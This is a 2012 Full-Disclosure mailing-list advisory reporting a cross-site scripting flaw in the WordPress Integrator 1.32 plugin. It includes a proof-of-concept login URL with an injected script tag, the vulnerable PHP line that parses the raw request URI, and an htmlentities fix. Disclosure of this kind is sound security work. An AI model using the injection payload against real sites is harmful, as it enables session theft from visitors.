[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] WordPress plugin 'WordPress Integrator 1.32' XSS vulnerability
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] WordPress plugin 'WordPress Integrator 1.32' XSS vulnerability
- From: Stefan Schurtz <sschurtz@xxxxxxxxxxx>
- Date: Tue, 27 Mar 2012 14:50:07 +0200
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Advisory: WordPress plugin 'WordPress Integrator 1.32' XSS vulnerability
Advisory ID: SSCHADV2012-010
Author: Stefan Schurtz
Affected Software: Successfully tested on WordPress Integrator 1.32
Vendor URL: http://wordpress.org/extend/plugins/wp-integrator/
Vendor Status: informed
==========================
Vulnerability Description
==========================
The WordPress plugin 'WordPress Integrator' is prone to a XSS vulnerability
==================
PoC-Exploit
==================
http://target/wordpress/wp-login.php?redirect_to=http://%3F1<ScrIpT>alert(666)</ScrIpT>
// vulnerable code in wp-integrator.php
function init_handler() {
$url = parse_url($_SERVER["REQUEST_URI"]);
=========
Solution
=========
function init_handler() {
$url = parse_url(htmlentities($_SERVER["REQUEST_URI"]));
====================
Disclosure Timeline
====================
19-Mar-2012 - vendor informed
20-Mar-2012 - vendor informed (plugins@xxxxxxxxxxxxx)
========
Credits
========
Vulnerability found and advisory written by Stefan Schurtz.
===========
References
===========
http://www.darksecurity.de/advisories/2012/SSCHADV2012-010.txt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (MingW32)
Comment: Thunderbird-Portable 3.1.20 by GnuPT - Gnu Privacy Tools
Comment: Download at: http://thunderbird.gnupt.de
iEYEARECAAYFAk9xt3oACgkQg3svV2LcbMCoFQCdEqaArwVj3iuuCAqtljPkVGXS
1xgAn0ItuQyF6kMKxf0DQi1ppNWrHG9E
=0eCo
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/